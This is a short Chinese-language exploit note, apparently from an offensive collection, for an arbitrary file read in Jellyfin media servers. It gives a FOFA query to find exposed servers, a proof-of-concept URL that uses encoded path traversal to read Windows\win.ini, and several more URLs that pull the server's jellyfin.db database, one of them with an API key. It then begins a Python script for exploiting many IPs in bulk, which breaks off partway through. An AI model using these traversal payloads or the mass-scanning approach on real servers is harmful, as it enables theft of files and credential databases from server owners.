FOFA语句:
title="Jellyfin"
可以通过访问
http://<url>/Audio/anything/hls/<文件路径>/stream.mp3/
读取任意文件。
POC:
http://xxx.xxx.xxx.xxx/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
Content-Type: application/octet-stream
其它URL:
/Audio/anything/hls/..\data\jellyfin.db/stream.mp3/
/Videos/anything/hls/m/..\data\jellyfin.db
/Videos/anything/hls/..\data\jellyfin.db/stream.m3u8/?api_key=4c5750626da14b0a804977b09bf3d8f7
batch.py(python3)
#批量ip
import requests
import sys
import urllib3
urllib3.disable_warnings()
if len(sys.argv)!=2:
print('Usage: python3 xxx.py urls